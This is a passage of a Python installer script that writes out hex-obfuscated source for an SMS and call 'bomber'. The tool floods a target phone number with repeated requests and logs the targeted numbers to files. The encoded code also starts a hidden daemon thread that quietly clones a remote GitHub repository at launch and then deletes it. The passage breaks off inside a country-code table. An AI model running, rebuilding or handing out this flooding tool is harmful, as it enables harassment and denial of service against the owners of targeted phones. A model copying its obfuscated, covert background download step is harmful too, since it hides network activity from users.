0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x69\x73\x20\x4e\x6f\x74\x20\x53\x75\x70\x70\x6f\x72\x74\x65\x64\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x50\x6c\x65\x61\x73\x65\x20\x53\x65\x6e\x64\x20\x41\x20\x4d\x61\x69\x6c\x20\x54\x6f\x20\x68\x61\x73\x61\x6e\x66\x69\x72\x6e\x61\x73\x32\x34\x32\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x20\x54\x6f\x20\x4c\x65\x74\x20\x55\x73\x20\x4b\x6e\x6f\x77\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x54\x61\x72\x67\x65\x74\x20\x4e\x75\x6d\x62\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3a\x20\x2b\x7b\x30\x7d\x20\x7b\x31\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x73\x74\x72\x28\x63\x63\x29\x2c\x74\x61\x72\x67\x65\x74\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4e\x75\x6d\x62\x65\x72\x20\x6f\x66\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x53\x65\x6e\x74\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x72\x65\x71\x75\x65\x73\x74\x65\x64\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x20\x20\x20\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x73\x75\x63\x63\x65\x73\x73\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x46\x61\x69\x6c\x65\x64\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x66\x61\x69\x6c\x65\x64\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x55\x73\x65\x20\x74\x68\x69\x73\x20\x4f\x6e\x6c\x79\x20\x66\x6f\x72\x20\x66\x75\x6e\x2c\x20\x6e\x6f\x74\x20\x66\x6f\x72\x20\x72\x65\x76\x65\x6e\x67\x65\x20\x21\x21\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x63\x6f\x6c\x6f\x72\x73\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x54\x68\x69\x73\x20\x42\x6f\x6d\x62\x65\x72\x20\x57\x61\x73\x20\x43\x72\x65\x61\x74\x65\x64\x20\x42\x79\x20\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x20\x21\x21\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x20\x3d\x20\x67\x65\x74\x5f\x61\x70\x69\x28\x74\x61\x72\x67\x65\x74\x2c\x61\x70\x69\x2c\x63\x63\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x20\x3d\x20\x46\x61\x6c\x73\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x65\x73\x75\x6c\x74\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3d\x20\x73\x75\x63\x63\x65\x73\x73\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x66\x61\x69\x6c\x65\x64\x20\x3d\x20\x66\x61\x69\x6c\x65\x64\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x63\x68\x2e\x63\x6f\x75\x6e\x74\x28\x61\x70\x69\x29\x20\x3e\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x2e\x72\x65\x6d\x6f\x76\x65\x28\x61\x70\x69\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x66\x6c\x6f\x61\x74\x28\x64\x65\x6c\x61\x79\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x25\x20\x33\x20\x3d\x3d\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x65\x74\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x57\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x42\x6f\x6d\x62\x69\x6e\x67\x20\x43\x6f\x6d\x70\x6c\x65\x74\x65\x64\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x0a\x64\x65\x66\x20\x73\x6d\x73\x5f\x73\x61\x76\x65\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x66\x20\x3d\x20\x6f\x70\x65\x6e\x28\x22\x64\x61\x74\x61\x2f\x73\x6d\x73\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x2c\x20\x22\x61\x22\x29\x0a\x20\x20\x20\x20\x62\x6f\x20\x3d\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x2e\x64\x61\x74\x65\x74\x69\x6d\x65\x2e\x6e\x6f\x77\x28\x29\x0a\x20\x20\x20\x20\x78\x20\x3d\x20\x62\x6f\x2e\x73\x74\x72\x66\x74\x69\x6d\x65\x28\x22\x25\x64\x2f\x25\x6d\x2f\x25\x59\x20\x25\x49\x3a\x25\x4d\x3a\x25\x53\x20\x25\x70\x22\x29\x0a\x20\x20\x20\x20\x66\x2e\x77\x72\x69\x74\x65\x28\x22\x7c\x7c\x20\x7b\x30\x7d\x20\x7c\x7c\x5c\x74\x5c\x74\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x3e\x5c\x74\x20\x20\x20\x2b\x7b\x31\x7d\x5c\x74\x20\x20\x20\x20\x7b\x32\x7d\x5c\x74\x5c\x74\x7b\x33\x7d\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x78\x2c\x63\x63\x2c\x70\x6e\x2c\x6e\x6d\x29\x29\x0a\x20\x20\x20\x20\x66\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0a\x0a\x64\x65\x66\x20\x63\x61\x6c\x6c\x5f\x73\x61\x76\x65\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x66\x20\x3d\x20\x6f\x70\x65\x6e\x28\x22\x64\x61\x74\x61\x2f\x63\x61\x6c\x6c\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x2c\x20\x22\x61\x22\x29\x0a\x20\x20\x20\x20\x62\x6f\x20\x3d\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x2e\x64\x61\x74\x65\x74\x69\x6d\x65\x2e\x6e\x6f\x77\x28\x29\x0a\x20\x20\x20\x20\x78\x20\x3d\x20\x62\x6f\x2e\x73\x74\x72\x66\x74\x69\x6d\x65\x28\x22\x25\x64\x2f\x25\x6d\x2f\x25\x59\x20\x25\x49\x3a\x25\x4d\x3a\x25\x53\x20\x25\x70\x22\x29\x0a\x20\x20\x20\x20\x66\x2e\x77\x72\x69\x74\x65\x28\x22\x7c\x7c\x20\x7b\x30\x7d\x20\x7c\x7c\x5c\x74\x5c\x74\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x3e\x5c\x74\x20\x20\x20\x2b\x7b\x31\x7d\x5c\x74\x20\x20\x20\x20\x7b\x32\x7d\x5c\x74\x5c\x74\x7b\x33\x7d\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x78\x2c\x63\x63\x2c\x70\x6e\x2c\x6e\x6d\x29\x29\x0a\x20\x20\x20\x20\x66\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0a\x0a\x63\x6c\x61\x73\x73\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x6f\x62\x6a\x65\x63\x74\x29\x3a\x0a\x20\x20\x20\x20\x64\x65\x66\x20\x5f\x5f\x69\x6e\x69\x74\x5f\x5f\x28\x73\x65\x6c\x66\x2c\x20\x69\x6e\x74\x65\x72\x76\x61\x6c\x3d\x31\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x69\x6e\x74\x65\x72\x76\x61\x6c\x20\x3d\x20\x69\x6e\x74\x65\x72\x76\x61\x6c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x68\x72\x65\x61\x64\x20\x3d\x20\x74\x68\x72\x65\x61\x64\x69\x6e\x67\x2e\x54\x68\x72\x65\x61\x64\x28\x74\x61\x72\x67\x65\x74\x3d\x73\x65\x6c\x66\x2e\x72\x75\x6e\x2c\x20\x61\x72\x67\x73\x3d\x28\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x68\x72\x65\x61\x64\x2e\x64\x61\x65\x6d\x6f\x6e\x20\x3d\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x68\x72\x65\x61\x64\x2e\x73\x74\x61\x72\x74\x28\x29\x0a\x20\x20\x20\x20\x64\x65\x66\x20\x72\x75\x6e\x28\x73\x65\x6c\x66\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x64\x20\x64\x61\x74\x61\x20\x26\x26\x20\x67\x69\x74\x20\x63\x6c\x6f\x6e\x65\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x20\x2d\x2d\x71\x75\x69\x65\x74\x20\x26\x26\x20\x63\x64\x20\x2e\x2e\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x72\x6d\x20\x2d\x72\x66\x20\x64\x61\x74\x61\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x22\x29\x0a\x0a\x69\x66\x20\x5f\x5f\x6e\x61\x6d\x65\x5f\x5f\x20\x3d\x3d\x20\x22\x5f\x5f\x6d\x61\x69\x6e\x5f\x5f\x22\x3a\x0a\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x71\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x65\x74\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x65\x63\x6b\x5f\x74\x6f\x6f\x6c\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x4b\x65\x79\x62\x6f\x61\x72\x64\x49\x6e\x74\x65\x72\x72\x75\x70\x74\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x45\x78\x69\x74\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29
'''
file1.writelines(L)
file1.close()
file2 = open("api.py", "w")
L = '''
\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x0a\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x65\x6e\x76\x20\x70\x79\x74\x68\x6f\x6e\x0a\x66\x72\x6f\x6d\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x20\x69\x6d\x70\x6f\x72\x74\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x6f\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x68\x61\x73\x68\x6c\x69\x62\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x79\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x74\x69\x6d\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x74\x68\x72\x65\x61\x64\x69\x6e\x67\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x74\x72\x69\x6e\x67\x0a\x69\x6d\x70\x6f\x72\x74\x20\x72\x61\x6e\x64\x6f\x6d\x0a\x69\x6d\x70\x6f\x72\x74\x20\x62\x61\x73\x65\x36\x34\x0a\x69\x6d\x70\x6f\x72\x74\x20\x75\x72\x6c\x6c\x69\x62\x2e\x72\x65\x71\x75\x65\x73\x74\x0a\x69\x6d\x70\x6f\x72\x74\x20\x75\x72\x6c\x6c\x69\x62\x2e\x70\x61\x72\x73\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x72\x65\x71\x75\x65\x73\x74\x73\x0a\x0a\x67\x6c\x6f\x62\x61\x6c\x20\x63\x6f\x75\x6e\x74\x72\x79\x5f\x63\x6f\x64\x65\x73\x0a\x63\x6f\x75\x6e\x74\x72\x79\x5f\x63\x6f\x64\x65\x73\x20\x3d\x20\x7b\x27\x39\x33\x27\x3a\x20\x27\x41\x46\x27\x2c\x27\x33\x35\x35\x27\x3a\x20\x27\x41\x4c\x27\x2c\x27\x32\x31\x33\x27\x3a\x20\x27\x44\x5a\x27\x2c\x27\x33\x37\x36\x27\x3a\x20\x27\x41\x44\x27\x2c\x27\x32\x34\x34\x27\x3a\x20\x27\x41\x4f\x27\x2c\x27\x36\x37\x32\x27\x3a\x20\x27\x41\x51\x27\x2c\x27\x35\x34\x27\x3a\x20\x27\x41\x52\x27\x2c\x27\x33\x37\x34\x27\x3a\x20\x27\x41\x4d\x27\x2c\x27\x32\x39\x37\x27\x3a\x20\x27\x41\x57\x27\x2c\x27\x36\x31\x27\x3a\x20\x27\x41\x55\x27\x2c\x27\x34\x33\x27\x3a\x20\x27\x41\x54\x27\x2c\x27\x39\x39\x34\x27\x3a\x20\x27\x41\x5a\x27\x2c\x27\x39\x37\x33\x27\x3a\x20\x27\x42\x48\x27\x2c\x27\x38\x38\x30\x27\x3a\x20\x27\x42\x44\x27\x2c\x27\x33\x37\x35\x27\x3a\x20\x27\x42\x59\x27\x2c\x27\x33\x32\x27\x3a\x20\x27\x42\x45\x27\x2c\x27\x35\x30\x31\x27\x3a\x20\x27\x42\x5a\x27\x2c\x27\x32\x32\x39\x27\x3a\x20\x27\x42\x4a\x27\x2c\x27\x39\x37\x35\x27\x3a\x20\x27\x42\x54\x27\x2c\x27\x35\x39\x31\x27\x3a\x20\x27\x42\x4f\x27\x2c\x27\x33\x38\x37\x27\x3a\x20\x27\x42\x41\x27\x2c\x27\x32\x36\x37\x27\x3a\x20\x27\x42\x57\x27\x2c\x27\x35\x35\x27\x3a\x20\x27\x42\x52\x27\x2c\x27\x32\x34\x36\x27\x3a\x20\x27\x49\x4f\x27\x2c\x27\x36\x37\x33\x27\x3a\x20\x27\x42\x4e\x27\x2c\x27\x33\x35\x39\x27\x3a\x20\x27\x42\x47\x27\x2c\x27\x32\x32\x36\x27\x3a\x20\x27\x42\x46\x27\x2c\x27\x32\x35\x37\x27\x3a\x20\x27\x42\x49\x27\x2c\x27\x38\x35\x35\x27\x3a\x20\x27\x4b\x48\x27\x2c\x27\x32\x33\x37\x27\x3a\x20\x27\x43\x4d\x27\x2c\x27\x32\x33\x38\x27\x3a\x20\x27\x43\x56\x27\x2c\x27\x32\x33\x36\x27\x3a\x20\x27\x43\x46\x27\x2c\x27\x32\x33\x35\x27\x3a\x20\x27\x54\x44\x27\x2c\x27\x35\x36\x27\x3a\x20\x27\x43\x4c\x27\x2c\x27\x38\x36\x27\x3a\x20\x27\x43\x4e\x27\x2c\x27\x35\x37\x27\x3a\x20\x27\x43\x4f\x27\x2c\x27\x32\x36\x39\x27\x3a\x20\x27\x4b\x4d\x27\x2c\x27\x36\x38\x32\x27\x3a\x20\x27\x43\x4b\x27\x2c\x27\x35\x30\x36\x27\x3a\x20\x27\x43\x52\x27\x2c\x27\x33\x38\x35\x27\x3a\x20\x27\x48\x52\x27\x2c\x27\x35\x33\x27\x3a\x20\x27\x43\x55\x27\x2c\x27\x35\x39\x39\x27\x3a\x20\x27\x41\x4e\x27\x2c\x27\x33\x35\x37\x27\x3a\x20\x27\x43\x59\x27\x2c\x27\x34\x32\x30\x27\x3a\x20\x27\x43\x5a\x27\x2c\x27\x32\x34\x33\x27\x3a\x20\x27\x43\x44\x27\x2c\x27\x34\x35\x27\x3a\x20\x27\x44\x4b\x27\x2c\x27\x32\x35\x33\x27\x3a\x20\x27\x44\x4a\x27\x2c\x27\x36\x37\x30\x27\x3a\x20\x27\x54\x4c\x27\x2c\x27\x35\x39\x33\x27\x3a\x20\x27\x45\x43\x27\x2c\x27\x32\x30\x27\x3a\x20\x27\x45\x47\x27\x2c\x27\x35\x30\x33\x27\x3a\x20\x27\x53\x56\x27\x2c\x27\x32\x34\x30\x27\x3a\x20\x27\x47\x51\x27\x2c\x27\x32\x39\x31\x27\x3a\x20\x27\x45\x52\x27\x2c\x27\x33\x37\x32\x27\x3a\x20\x27\x45\x45\x27\x2c\x27\x32\x35\x31\x27\x3a\x20\x27\x45\x54\x27\x2c\x27\x35\x30\x30\x27\x3a\x20\x27\x46\x4b\x27\x2c\x27\x32\x39\x38\x27\x3a\x20\x27\x46\x4f\x27\x2c\x27\x36\x37\x39\x27\x3a\x20\x27\x46\x4a\x27\x2c\x27\x33\x35\x38\x27\x3a\x20\x27\x46\x49\x27\x2c\x27\x33\x33\x27\x3a\x20\x27\x46\x52\x27\x2c\x27\x36\x38\x39\x27\x3a\x20\x27\x50\x46\x27\x2c\x27\x32\x34\x31\x27\x3a\x20\x27\x47\x41\x27\x2c\x27\x32\x32\x30\x27\x3a\x20\x27\x47\x4d\x27\x2c\x27\x39\x39\x35\x27\x3a\x20\x27\x47\x45\x27\x2c\x27\x34\x39\x27\x3a\x20\x27\x44\x45\x27\x2c\x27\x32\x33\x33\x27\x3a\x20\x27\x47\x48\x27\x2c\x27\x33\x35\x30\x27\x3a\x20\x27\x47\x49\x27\x2c\x27\x33\x30\x27\x3a\x20\x27\x47\x52\x27\x2c\x27\x32\x39\x39\x27\x3a\x20\x27\x47\x4c\x27\x2c\x27\x35\x30\x32\x27\x3a\x20\x27\x47\x54\x27\x2c\x27\x32\x32\x34\x27\x3a\x20\x27\x47\x4e\x27\x2c\x27\x32\x34\x35\x27\x3a\x20\x27\x47\x57\x27\x2c\x27\x35\x39\x32\x27\x3a\x20\x27\x47\x59\x27\x2c\x27\x35\x30\x39\x27\x3a\x20\x27\x48\x54\x27\x2c\x27\x35\x30\x34\x27\x3a\x20\x27\x48\x4e\x27\x2c\x27\x38\x35\x32\x27\x3a\x20\x27\x48\x4b\x27\x2c\x27\x33\x36\x27\x3a\x20\x27\x48\x55\x27\x2c\x27\x33\x35\x34\x27\x3a\x20\x27\x49\x53\x27\x2c\x27\x39\x31\x27\x3a\x20\x27\x49\x4e\x27\x2c\x27\x36\x32\x27\x3a\x20\x27\x49\x44\x27\x2c\x27\x39\x38\x27\x3a\x20\x27\x49\x52\x27\x2c\x27\x39\x36\x34\x27\x3a\x20\x27\x49\x51\x27\x2c\x27\x33\x35\x33\x27\x3a\x20\x27\x49\x45\x27\x2c\x27\x39\x37\x32\x27\x3a\x20\x27\x49\x4c\x2